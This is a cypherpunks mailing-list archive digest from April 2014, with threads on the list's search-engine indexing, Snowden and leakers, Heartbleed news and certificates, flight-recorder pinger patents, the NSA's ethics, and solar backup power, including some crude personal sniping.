Subject: How come search engines don't crawl the list and I can't find 'robots.txt'?
In-Reply-To: <20140413135352.GA2487@sivokote.iziade.m$>
References: <20140413135352.GA2487@sivokote.iziade.m$>
Message-ID:

On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski wrote:
> AFAICT the list archives don't show in search engines
> and in addition don't see /robots.txt.
>
> How so?

back when traffic was handled on the al-qaeda.net domain, indexing by western search engines was considered to be "material support to Al-qaeda"...

now they've just forgotten to undo their filters.

;)

From coderman at gmail.com Sun Apr 13 07:13:34 2014
From: coderman at gmail.com (coderman)
Date: Sun, 13 Apr 2014 07:13:34 -0700
Subject: [cryptome] Re: snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com>
Message-ID:

On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote:
> Great that Snowden is getting another chance to speak for himself,

speaking of speaking directly, i hear one fine JYA got to mingle with the leakers?

how hard did you press for a mass doc drop, John? i would have donated toward such a bribe...

looks like an interesting crowd!
(who has .vid transcripts?)

best regards,
#JustALittleJealous

c.f.: http://cryptome.org/greenwald-miranda-young.jpg

From jamesdbell9 at yahoo.com Sun Apr 13 10:43:16 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Sun, 13 Apr 2014 10:43:16 -0700 (PDT)
Subject: Fw: Curious Intellectual Property Food-for-thought: "Live-forever Pingers"
In-Reply-To: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com>
References: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com>
Message-ID: <1397410996.48713.YahooMailNeo@web126202.mail.ne1.yahoo.com>

[apparently this didn't 'stick' the first time]

Some people debate whether 'intellectual property' (such as patents) should exist. The standard for patenting is said to be: An invention, to be patentable, should be "new, useful, and unobvious to those skilled in the art".
A month ago, when it became obvious that finding Air Malaysia Flight 370 could be difficult, the 30-day limit of the electronic pingers got me to thinking. Why? Instead of pinging for 30 days, why not have them ping increasingly slowly, so that the pinger would last 'forever'. Considered discretely, let it ping at the normal rate for 1 week, at half the rate for the next week, at quarter the rate for the subsequent rate, etc. Or, have a continuous equivalent of this, a ping-rate which slows to approximate this rate over time. This kind of pinger would 'never' run out.

Should this idea be patentable? Is it new? I haven't heard of it. Is it useful? It is now clear why it would be useful...now!!! Is it 'un-obvious'? Well, despite the fact that I just thought of it a month ago, and I had never heard it proposed before, I wonder why it shouldn't be called 'obvious'. If anything, I think it's amazing that it hasn't been implemented before. People who work in aeronautics and electronics are smart and imaginative...at least I thought they were...until now?

It should also be possible to include in the ping, information (transmitted by pulse-position information) about the last lat/lon received by the aircraft.

Jim Bell

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2436 bytes
Desc: not available
URL:

From rysiek at hackerspace.pl Sun Apr 13 02:16:06 2014
From: rysiek at hackerspace.pl (rysiek)
Date: Sun, 13 Apr 2014 11:16:06 +0200
Subject: "How I obtained the private key for www.cloudflarechallenge.com"
Message-ID: <3142883.qliPh6rQWL@lap>

Hi there,

https://gist.github.com/epixoip/10570627

--
Pozdr
rysiek

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 316 bytes
Desc: This is a digitally signed message part.
URL:

From jya at pipeline.com Sun Apr 13 09:01:02 2014
From: jya at pipeline.com (John Young)
Date: Sun, 13 Apr 2014 12:01:02 -0400
Subject: [cryptome] Re: snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com>
Message-ID:

The Polk Award plaques have concealed cavity transmitters, so our Google glasses indicate. Back-up. we palmed a sliver RFID in GG's wide mouthed molar, another in Miranda's steely butt, Poitras's panoptic camera, Gellman's top-sekret OTR widget, MacAskill's brogue-decryptor (we saw him plant a 0-day craw deep inside James Ball's kisser). Our totally undoctored vids and transcripts are at Amazon, Utah, Four Eyes, RU, CN, BR, all of them on the same transceiving thieving pipe, each with a twinned JPmorgan, Goldman Sachs fiber, so reports our splitter at Ross Anderson's lab in Oxbridge-Cheltenham, centroid of the universe's gobbling inadvertencies. The fake one underskinned in Markus Kuhn's vestigial tail. Real one infected at Vatican, eternal cloud of the pipe of pipes.

-----

On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote:
> Great that Snowden is getting another chance to speak for himself,

speaking of speaking directly, i hear one fine JYA got to mingle with the leakers?

how hard did you press for a mass doc drop, John? i would have donated toward such a bribe...

looks like an interesting crowd!
(who has .vid transcripts?)

best regards,
#JustALittleJealous

c.f.: http://cryptome.org/greenwald-miranda-young.jpg

From jya at pipeline.com Sun Apr 13 12:32:06 2014
From: jya at pipeline.com (John Young)
Date: Sun, 13 Apr 2014 15:32:06 -0400
Subject: [cryptome] Re: snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
Message-ID:

Dear Maligned Ethicist Machet,

Your fee for complaining about star *ucking has been transmitted to Hettinga's offshore dark pool of smegma.
We appreciate your disclosing this private banking arrangement to encourage others to reap the benefits of advertising online the ancient love scribble scratched on rubber tree trunks, on kindergarten desktops, on unisex toilet stalls and distributed by porous-sheathed onion routers to mind*uck horny espionage pornsters posting and ogling kiddie-selfies for entrapment bonuses. Underarmored in *uck cpunks tees.

@20Committee

At 01:17 PM 4/13/2014, you wrote:
>have not been more disappointed by star *ucking in i dont know when
>
>hardens my resolve to never align with any mother *ucker
>
>only align with ethics

From hettinga at gmail.com Sun Apr 13 13:47:49 2014
From: hettinga at gmail.com (Robert Hettinga)
Date: Sun, 13 Apr 2014 16:47:49 -0400
Subject: [cryptome] snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
Message-ID:

On Apr 13, 2014, at 3:32 PM, John Young wrote:

> Hettinga's offshore dark pool of smegma

It was ever thus.

Cheers,
RAH

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 496 bytes
Desc: Message signed with OpenPGP using GPGMail
URL:

From guninski at guninski.com Sun Apr 13 06:53:52 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Sun, 13 Apr 2014 16:53:52 +0300
Subject: How come search engines don't crawl the list and I can't find 'robots.txt'?
Message-ID: <20140413135352.GA2487@sivokote.iziade.m$>

AFAICT the list archives don't show in search engines and in addition don't see /robots.txt.

How so?
From guninski at guninski.com Sun Apr 13 07:15:21 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Sun, 13 Apr 2014 17:15:21 +0300
Subject: "How I obtained the private key for www.cloudflarechallenge.com"
In-Reply-To:
References: <3142883.qliPh6rQWL@lap>
Message-ID: <20140413141521.GB2487@sivokote.iziade.m$>

On Sun, Apr 13, 2014 at 06:56:31AM -0700, coderman wrote:
> On Sun, Apr 13, 2014 at 6:55 AM, coderman wrote:
> > ...
>
> well that formatted horribly. time for coffee...
> (link to raw is
> https://gist.githubusercontent.com/epixoip/10570627/raw/570510ed21c5db6301dc377b834760b32b818f73/cloudflare_challenge
> for you curl'ers...)

AFAICT this won't work if the bitsizes of p and q are not divisible by 8, but this means tricky key generation.

From carimachet at gmail.com Sun Apr 13 10:17:06 2014
From: carimachet at gmail.com (Cari Machet)
Date: Sun, 13 Apr 2014 17:17:06 +0000
Subject: [cryptome] Re: snowman news
In-Reply-To: <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
Message-ID:

have not been more disappointed by star fucking in i dont know when

hardens my resolve to never align with any mother fucker

only align with ethics

On Sun, Apr 13, 2014 at 4:50 PM, wrote:
>
> > Message of 13/04/14 16:14
> > From: "coderman"
> > On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote:
> > > Great that Snowden is getting another chance to speak for himself,
> >
> > speaking of speaking directly, i hear one fine JYA got to mingle with
> > the leakers?
> >
> > how hard did you press for a mass doc drop, John? i would have
> > donated toward such a bribe...
> >
> > looks like an interesting crowd!
> > (who has .vid transcripts?)
>
> What about crowdfunding leakers? If we offer enough for them to abandon
> their jobs safely, that may help quite a number of them to bring light
> against all kinds of abuses.
> --

Cari Machet NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information. If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2145 bytes
Desc: not available
URL:

From guninski at guninski.com Sun Apr 13 07:38:19 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Sun, 13 Apr 2014 17:38:19 +0300
Subject: How come search engines don't crawl the list and I can't find 'robots.txt'?
In-Reply-To:
References: <20140413135352.GA2487@sivokote.iziade.m$>
Message-ID: <20140413143819.GC2487@sivokote.iziade.m$>

On Sun, Apr 13, 2014 at 07:08:27AM -0700, coderman wrote:
> On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski wrote:
> > AFAICT the list archives don't show in search engines
> > and in addition don't see /robots.txt.
> >
> > How so?
>
> back when traffic was handled on the al-qaeda.net domain, indexing by
> western search engines was considered to be "material support to
> Al-qaeda"...
>
> now they've just forgotten to undo their filters.
>
> ;)

lol...

the russian and chinese comrades don't show the list too, might be for technical reasons.

does a single search engine crawl the archives and display the results?
From jya at pipeline.com Sun Apr 13 15:06:30 2014
From: jya at pipeline.com (John Young)
Date: Sun, 13 Apr 2014 18:06:30 -0400
Subject: [cryptome] snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
Message-ID:

http://smegmamusic.com/site/

Top fans:

https://myspace.com/smegmatheoriginal/topfans

At 05:29 PM 4/13/2014, Sampo Syreeni wrote:
>On 2014-04-13, Robert Hettinga wrote:
>
>>>Hettinga's offshore dark pool of smegma
>>
>>It was ever thus.
>
>...and we are Legion.
>--
>Sampo Syreeni, aka decoy - decoy at iki.fi, http://decoy.iki.fi/front
>+358-40-3255353, 025E D175 ABE5 027C 9494 EEB0 E090 8BA9 0509 85C2

From tpb-crypto at laposte.net Sun Apr 13 09:50:17 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 13 Apr 2014 18:50:17 +0200
Subject: [cryptome] Re: snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com>
Message-ID: <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>

> Message of 13/04/14 16:14
> From: "coderman"
> On Mon, Apr 7, 2014 at 4:48 PM, John Young wrote:
> > Great that Snowden is getting another chance to speak for himself,
>
> speaking of speaking directly, i hear one fine JYA got to mingle with
> the leakers?
>
> how hard did you press for a mass doc drop, John? i would have
> donated toward such a bribe...
>
> looks like an interesting crowd!
> (who has .vid transcripts?)

What about crowdfunding leakers? If we offer enough for them to abandon their jobs safely, that may help quite a number of them to bring light against all kinds of abuses.
From guninski at guninski.com Sun Apr 13 09:23:52 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Sun, 13 Apr 2014 19:23:52 +0300
Subject: [tor-talk] [cryptography] The Heartbleed Bug is a serious vulnerability in OpenSSL
In-Reply-To:
References: <149518711.83101.1397221629681.JavaMail.www@wwinf8224> <20140411133240.GA16269@sivokote.iziade.m$> <1409607.uUXFrpi0Wi@lap>
Message-ID: <20140413162352.GD2487@sivokote.iziade.m$>

On Fri, Apr 11, 2014 at 07:02:53PM -0400, grarpamp wrote:
> On Fri, Apr 11, 2014 at 10:43 AM, rysiek wrote:
> > On Friday, 11 April 2014 16:32:44, Georgi Guninski writes:
> >> Is there a significant rise of revoked certs caused
> >> by HB paranoia?
> >
> > No idea, but we're considering revoking ours.
>
> As to ocsp/crl revocation, haven't looked (depending on
> application, getting the cert swapped out is more important
> anyway).
> But those of us who pin down certs instead of trusting CA's
> have been doing quite a bit of reconfiguring this week
> due to upstream certs being swapped out.

Well, g00gle have strange cert policy:

    Issuer: C=US, O=Google Inc, CN=Google Internet Authority G2
    Validity
        Not Before: Apr 2 16:00:48 2014 GMT
        Not After : Jul 1 00:00:00 2014 GMT

The visible ASCII structure in the big cert almost sure comes from the ALT names :(

From tpb-crypto at laposte.net Sun Apr 13 10:24:41 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 13 Apr 2014 19:24:41 +0200
Subject: [cryptome] Re: snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
Message-ID: <655674196.402269.1397409881581.JavaMail.www@wwinf8305>

> Message of 13/04/14 19:17
> From: "Cari Machet"
> To: tpb-crypto at laposte.net
> have not been more disappointed by star fucking in i dont know when
>
> hardens my resolve to never align with any mother fucker
>
> only align with ethics
>

Yes, yes, let the butthurt flow through you.
From tpb-crypto at laposte.net Sun Apr 13 10:30:48 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 13 Apr 2014 19:30:48 +0200
Subject: How come search engines don't crawl the list and I can't find 'robots.txt'?
In-Reply-To: <20140413143819.GC2487@sivokote.iziade.m$>
References: <20140413135352.GA2487@sivokote.iziade.m$> <20140413143819.GC2487@sivokote.iziade.m$>
Message-ID: <904877.402644.1397410248594.JavaMail.www@wwinf8305>

> Message of 13/04/14 17:07
> From: "Georgi Guninski"
> To: "coderman"
> Cc: "cpunks"
> Subject: Re: How come search engines don't crawl the list and I can't find 'robots.txt'?
>
> On Sun, Apr 13, 2014 at 07:08:27AM -0700, coderman wrote:
> > On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski wrote:
> > > AFAICT the list archives don't show in search engines
> > > and in addition don't see /robots.txt.
> > >
> > > How so?
> >
> > back when traffic was handled on the al-qaeda.net domain, indexing by
> > western search engines was considered to be "material support to
> > Al-qaeda"...
> >
> > now they've just forgotten to undo their filters.
> >
> > ;)
>
> lol...
>
> the russian and chinese comrades don't show the
> list too, might be for technical reasons.
>
> does a single search engine crawl
> the archives and display the results?
>

I have heard about the existence of this mailing list for years ... yet never found it with search engines. I never did a positive effort to find it too, let's be honest. It was kind of "one day I may meet that crowd by chance". One day a few months ago I found a guy that posted in another list I was subscribed to and also here. Lo and behold, that's the famed mailing list that cannot be found anywhere where reasonable people would search.

You guys are hidden in the deepwebz, Google doesn't index it, you are the bad bad turrists, lol.
From carimachet at gmail.com Sun Apr 13 13:27:08 2014
From: carimachet at gmail.com (Cari Machet)
Date: Sun, 13 Apr 2014 20:27:08 +0000
Subject: [cryptome] Re: snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
Message-ID:

dear john

nice attempt to deflect criticism

i read your whatever scramble of words that was as a sort of internalizing of some part of the criticism or something mayb - have a sleep on it and think about that you were criticized out of a work ethic and your ego is just a sheathing

On Sun, Apr 13, 2014 at 7:32 PM, John Young wrote:

> Dear Maligned Ethicist Machet,
>
> Your fee for complaining about star *ucking has been transmitted
> to Hettinga's offshore dark pool of smegma.
>
> We appreciate your disclosing this private banking arrangement
> to encourage others to reap the benefits of advertising online
> the ancient love scribble scratched on rubber tree trunks, on
> kindergarten desktops, on unisex toilet stalls and distributed by
> porous-sheathed onion routers to mind*uck horny espionage
> pornsters posting and ogling kiddie-selfies for entrapment
> bonuses. Underarmored in *uck cpunks tees.
>
> @20Committee
>
>
>
> At 01:17 PM 4/13/2014, you wrote:
>
>> have not been more disappointed by star *ucking in i dont know when
>>
>> hardens my resolve to never align with any mother *ucker
>>
>> only align with ethics
>>
>
>

--
Cari Machet NYC 646-436-7795
carimachet at gmail.com
AIM carismachet
Syria +963-099 277 3243
Amman +962 077 636 9407
Berlin +49 152 11779219
Reykjavik +354 894 8650
Twitter: @carimachet

7035 690E 5E47 41D4 B0E5 B3D1 AF90 49D6 BE09 2187

Ruh-roh, this is now necessary: This email is intended only for the addressee(s) and may contain confidential information.
If you are not the intended recipient, you are hereby notified that any use of this information, dissemination, distribution, or copying of this email without permission is strictly prohibited.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2543 bytes
Desc: not available
URL:

From juan.g71 at gmail.com Sun Apr 13 13:32:18 2014
From: juan.g71 at gmail.com (Linux User)
Date: Sun, 13 Apr 2014 20:32:18 +0000
Subject: NSA good guys
In-Reply-To:
References: <534691BD.1060904@cathalgarvey.me>
Message-ID: <534b1e10.c647ec0a.276f.ffff8735@mx.google.com>

On Sun, 13 Apr 2014 01:28:14 +0200
Lodewijk andré de la porte wrote:

>
> So. Are the NSA guys good guys? Well. They're the enemy of the
> people, as they invade their privacy and therewith their safety. If
> you can be blackmailed, studied, influenced, etc. you are weak and
> vulnerable. Preaching to the choir, I guess.

Well, I get the impression that some of the voices of this choir still need some preaching directed at them =P

I noticed something interesting in digital 'security' circles. People who deal with 'security' are, at first sight, technical people and are concerned with issues such as factoring integers, permutations, routing protocols, etc. etc. etc. However, all their technical expertise exists to achieve some political goals. And when you look at the political beliefs of these people, you see that they suck big time. As engineers they may be competent, but there's a step above engineering, and there, they fail.

> So I cannot call them
> good guys by a very long shot.
>
> Are the NSA guys bad guys? Well, they do anything to protect their
> nation from whatever attack could happen (bad for non-US; me). They
> steal secrets for their government (bad for non-US; me). They assist
> foreign secret agencies in subverting or avoiding legal restrictions
> put in place to protect citizens as (real/wise/elected) politicians
> see fit.
> (very bad for non-US; me)
>
> Uh. Yeah. I guess they're the bad guys. I usually feel like they are
> soldiers on a certain mission, and so no blame comes to them. But I
> feel more strongly that the organization is built to produce
> law-breaking, privacy-destroying, unethical, unfriendly, aggressive,
> anticompetitive, distracting and confusing and ultimately just *mean*
> practices.
>
> So yes: the NSA is *EVIL* to the maximum realistic extent.
>
> The NSA's people enjoy a margin of appreciation. They're doing a job.
> They have their reasons. But I do believe most of them are keenly
> aware of the extremely large quantity of thoroughly unethical things
> their organization is doing, and must be considered at least
> partially responsible.

From tpb-crypto at laposte.net Sun Apr 13 11:38:53 2014
From: tpb-crypto at laposte.net (tpb-crypto at laposte.net)
Date: Sun, 13 Apr 2014 20:38:53 +0200
Subject: Fw: Curious Intellectual Property Food-for-thought: "Live-forever Pingers"
In-Reply-To: <1397410996.48713.YahooMailNeo@web126202.mail.ne1.yahoo.com>
References: <1397335078.49963.YahooMailNeo@web126204.mail.ne1.yahoo.com> <1397410996.48713.YahooMailNeo@web126202.mail.ne1.yahoo.com>
Message-ID: <571107064.411026.1397414332991.JavaMail.www@wwinf8223>

> Message of 13/04/14 20:12
> From: "jim bell"
> [apparently this didn't 'stick' the first time]
> Some people debate whether 'intellectual property' (such as patents) should exist. The standard for patenting is said to be: An invention, to be patentable, should be "new, useful, and unobvious to those skilled in the art". A month ago, when it became obvious that finding Air Malaysia Flight 370 could be difficult, the 30-day limit of the electronic pingers got me to thinking. Why? Instead of pinging for 30 days, why not have them ping increasingly slowly, so that the pinger would last 'forever'.
> Considered discretely, let it ping at the normal rate for 1 week, at half the rate for the next week, at quarter the rate for the subsequent rate, etc. Or, have a continuous equivalent of this, a ping-rate which slows to approximate this rate over time. This kind of pinger would 'never' run out.
> Should this idea be patentable? Is it new? I haven't heard of it. Is it useful? It is now clear why it would be useful...now!!! Is it 'un-obvious'? Well, despite the fact that I just thought of it a month ago, and I had never heard it proposed before, I wonder why it shouldn't be called 'obvious'. If anything, I think it's amazing that it hasn't been implemented before. People who work in aeronautics and electronics are smart and imaginative...at least I thought they were...until now?
> It should also be possible to include in the ping, information (transmitted by pulse-position information) about the last lat/lon received by the aircraft.

It is not that your idea didn't "stick" but we have a different problem today than two centuries ago when patents were invented.

Patents were invented when people were very ignorant and simple things like boiling cucumbers inside a tightly sealed glass was an innovation that changed the world. Basically anything at that time was something simple yet important enough to warrant a patent. Until the beginning of the 20th century.

Now as you pointed out, it is not a matter of creating something nobody knows about. All problems are solvable, it is just a matter of someone putting their hands into it. Big things that would be patentable today, which are not obvious to anyone would be things like Star Wars hovering vehicles, light sabers, etc.

One patentable thing is from a guy that made a new kind of cellphone antenna that tracks the devices and sends individual beams to each device using less power and being much faster, you may have heard about it.
That's something which is not easy and cannot be easily done with current technology. How many times in a year do you hear about such inventions?

But like in ancient times, such wild ideas come out only every once in a while. That wouldn't keep the patent offices, lawyers, attorneys, engineers and all those that orbit around it occupied and pockets filled.

It looks like we ought to find other jobs for such people, otherwise they will fight tooth and nail to continue having every insignificant little invention patentable.

From juan.g71 at gmail.com Sun Apr 13 13:41:33 2014
From: juan.g71 at gmail.com (Linux User)
Date: Sun, 13 Apr 2014 20:41:33 +0000
Subject: How come search engines don't crawl the list and I can't find 'robots.txt'?
In-Reply-To:
References: <20140413135352.GA2487@sivokote.iziade.m$>
Message-ID: <534b203b.4771ec0a.5517.6908@mx.google.com>

On Sun, 13 Apr 2014 07:08:27 -0700
coderman wrote:

> On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski
> wrote:
> > AFAICT the list archives don't show in search engines
> > and in addition don't see /robots.txt.
> >
> > How so?
>
> back when traffic was handled on the al-qaeda.net domain, indexing by
> western search engines was considered to be "material support to
> Al-qaeda"...
>
> now they've just forgotten to undo their filters.
>
> ;)

https://www.google.com/search?q=test+site%3Acpunks.org%2Fpipermail%2Fcypherpunks%2F

the archives are indeed indexed?

From dan at geer.org Sun Apr 13 18:46:32 2014
From: dan at geer.org (dan at geer.org)
Date: Sun, 13 Apr 2014 21:46:32 -0400
Subject: a speech
In-Reply-To: Your message of "Sun, 13 Apr 2014 06:44:56 PDT."
Message-ID: <20140414014632.6BA012280D8@palinka.tinho.net>

Thanks for the note and the compliment. I took Kelly Ziegler at her word (*) given her role as an executive at NERC (North American Electric Reliability Corporation).
--dan

(*) https://www.usenix.org/conference/usenixsecurity10/grid-phd-smart-grid-cyber-security-and-future-keeping-lights

From decoy at iki.fi Sun Apr 13 14:29:21 2014
From: decoy at iki.fi (Sampo Syreeni)
Date: Mon, 14 Apr 2014 00:29:21 +0300 (EEST)
Subject: [cryptome] snowman news
In-Reply-To:
References: <001501cf52b8$3407a4d0$9c16ee70$@com> <1921911960.400353.1397407817750.JavaMail.www@wwinf8305>
Message-ID:

On 2014-04-13, Robert Hettinga wrote:

>> Hettinga's offshore dark pool of smegma
>
> It was ever thus.

...and we are Legion.
--
Sampo Syreeni, aka decoy - decoy at iki.fi, http://decoy.iki.fi/front
+358-40-3255353, 025E D175 ABE5 027C 9494 EEB0 E090 8BA9 0509 85C2

From jamesdbell9 at yahoo.com Mon Apr 14 00:46:03 2014
From: jamesdbell9 at yahoo.com (jim bell)
Date: Mon, 14 Apr 2014 00:46:03 -0700 (PDT)
Subject: White House, spy agencies deny NSA exploited 'Heartbleed' bug
Message-ID: <1397461563.26026.YahooMailNeo@web126202.mail.ne1.yahoo.com>

White House, spy agencies deny NSA exploited 'Heartbleed' bug

[photo caption: Security experts warn there is little Internet users can do to protect themselves]

WASHINGTON (Reuters) - The White House and U.S. intelligence agencies said on Friday neither the National Security Agency nor any other part of the government were aware before this month of the "Heartbleed" bug, denying a report that the spy agency exploited the glitch in widely used Web encryption technology to gather intelligence.

The White House, the NSA and the Office of the Director of National Intelligence issued statements after Bloomberg reported that the NSA was aware of the bug for at least two years and exploited it in order to obtain passwords and other basic information used in hacking operations. The Bloomberg report cited two unnamed sources it said were familiar with the matter.

The Heartbleed bug is considered one of the most serious Internet security flaws to be uncovered in recent years.
"Reports that NSA or any other part of the government were aware of the so-called Heartbleed vulnerability before April 2014 are wrong," White House National Security Council spokeswoman Caitlin Hayden said in a statement. "This administration takes seriously its responsibility to help maintain an open, interoperable, secure and reliable Internet," Hayden added. Bloomberg was not immediately available to comment. The discovery of Heartbleed by researchers with Google Inc and a small security firm, Codenomicon, prompted the U.S. Homeland Security Department to advise businesses on Tuesday to review their servers to see if they were using vulnerable versions of widely used software known as OpenSSL. OpenSSL is used to encrypt email and other communications and to protect the websites of big Internet companies, including Facebook Inc, Google Inc and Yahoo Inc. The bug, disclosed Monday, allows hackers to steal data without a trace. NSA spokeswoman Vanee Vines said in a separate statement: "NSA was not aware of the recently identified vulnerability in OpenSSL, the so-called Heartbleed vulnerability, until it was made public in a private-sector cybersecurity report." Hayden said the federal government relies on OpenSSL to protect the privacy of users of government websites and other online services. "If the federal government, including the intelligence community, had discovered this vulnerability prior to last week, it would have been disclosed to the community responsible for OpenSSL," Hayden added. Hayden said that when U.S. agencies discover a new vulnerability in commercial and open-source software, "it is in the national interest to responsibly disclose the vulnerability rather than to hold it for an investigative or intelligence purpose." Such vulnerabilities are known as "zero-day" flaws because the software developers have had zero days to fix them. 
In December, a five-member advisory panel convened to review electronic surveillance policy urged the White House to sharply curtail the use of undisclosed flaws and stop undercutting encryption standards. The panel included former White House cybersecurity advisor Richard Clarke. In late February, a senior White House official said the Obama administration was intensively studying both issues. The administration statements issued on Friday confirmed that the review had already "reinvigorated an interagency process for deciding when to share vulnerabilities" on a case-by-case basis. The activities of the NSA have come under sharp scrutiny since former agency contractor Edward Snowden leaked numerous documents exposing expansive U.S. surveillance efforts. Even before Snowden's emergence, former officials, including Clarke, told Reuters that offensive and spying considerations had dominated inside the NSA, causing it to withhold information instead of warning the public about new flaws. Clarke told Reuters Friday that the NSA had not known of Heartbleed. The U.S. government warned banks and other businesses on Friday to be on alert for hackers seeking to steal data exposed by the bug, as a German programmer who volunteered with OpenSSL took responsibility for inadvertently launching the security crisis. (Additional reporting by Joseph Menn; Editing by Jonathan Oatis) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 6824 bytes Desc: not available URL: From guninski at guninski.com Sun Apr 13 21:22:00 2014 From: guninski at guninski.com (Georgi Guninski) Date: Mon, 14 Apr 2014 07:22:00 +0300 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? 
In-Reply-To: <534b203b.4771ec0a.5517.6908@mx.google.com> References: <20140413135352.GA2487@sivokote.iziade.m$> <534b203b.4771ec0a.5517.6908@mx.google.com> Message-ID: <20140414042200.GA2560@sivokote.iziade.m$> On Sun, Apr 13, 2014 at 08:41:33PM +0000, Linux User wrote: > On Sun, 13 Apr 2014 07:08:27 -0700 > coderman wrote: > > > On Sun, Apr 13, 2014 at 6:53 AM, Georgi Guninski > > wrote: > > > AFAICT the list archives don't show in search engines > > > and in addition don't see /robots.txt. > > > > > > How so? > > > > back when traffic was handled on the al-qaeda.net domain, indexing by > > western search engines was considered to be "material support to > > Al-qaeda"... > > > > now they've just forgotten to undo their filters. > > > > ;) > > > > https://www.google.com/search?q=test+site%3Acpunks.org%2Fpipermail%2Fcypherpunks%2F > > > the archives are indeed indexed? search on google for: Heartbleed site:cpunks.org/pipermail/cypherpunks/ doesn't return anything for me. (and searching for openssl doesn't return anything from 2014 for me). From juan.g71 at gmail.com Mon Apr 14 00:26:30 2014 From: juan.g71 at gmail.com (Linux User) Date: Mon, 14 Apr 2014 10:26:30 +0300 Subject: How come search engines don't crawl the list and I can't find 'robots.txt'? In-Reply-To: <20140414042200.GA2560@sivokote.iziade.m$> References: <20140413135352.GA2487@sivokote.iziade.m$> <534b203b.4771ec0a.5517.6908@mx.google.com> <20140414042200.GA2560@sivokote.iziade.m$> Message-ID: <534b8dbd.7082ec0a.6788.ffffd651@mx.google.com> On Mon, 14 Apr 2014 07:22:00 +0300 Georgi Guninski wrote: > > > > https://www.google.com/search?q=test+site%3Acpunks.org%2Fpipermail%2Fcypherpunks%2F > > > > > > the archives are indeed indexed? > > search on google for: > > Heartbleed site:cpunks.org/pipermail/cypherpunks/ > > doesn't return anything for me. > > (and searching for openssl doesn't return > anything from 2014 for me). Hm, you're right. Seems that the indexing stopped at some point in 2013.... 
> > From hozer at hozed.org Mon Apr 14 08:46:43 2014 From: hozer at hozed.org (Troy Benjegerdes) Date: Mon, 14 Apr 2014 10:46:43 -0500 Subject: a speech In-Reply-To: <20140414014632.6BA012280D8@palinka.tinho.net> References: <20140414014632.6BA012280D8@palinka.tinho.net> Message-ID: <20140414154642.GT3180@nl.grid.coop> On Sun, Apr 13, 2014 at 09:46:32PM -0400, dan at geer.org wrote: > > Thanks for the note and the compliment. > > I took Kelly Ziegler at her word (*) given that her role as an executive > at NERC (Northamerican Electric Reliability Corporation). > > --dan > > (*) > https://www.usenix.org/conference/usenixsecurity10/grid-phd-smart-grid-cyber-security-and-future-keeping-lights > I would advise any cypherpunk that wants to keep their lights on to invest in a 48VDC system with (partial) battery backup. If your solar installer starts blathering about AC and inverters and batteries costing too much, get a new installer, or help me build some open-source hardware grid-tie inverters. If you have a say 5KW system, installers will try to sell you batteries to back up the entire 5kw. You only need a few hundred watts (and maybe 1 kilowatt-hour) of batteries. If you do it this way, it will cost less than buying electricity for the next 30 years. If there is a high-profile hack of some power grid device and utilities have to do a 'truck roll' to patch some magic utility box, then your solar payback time will probably drop to 5 years because you have to pay for the utilities insecurity. 
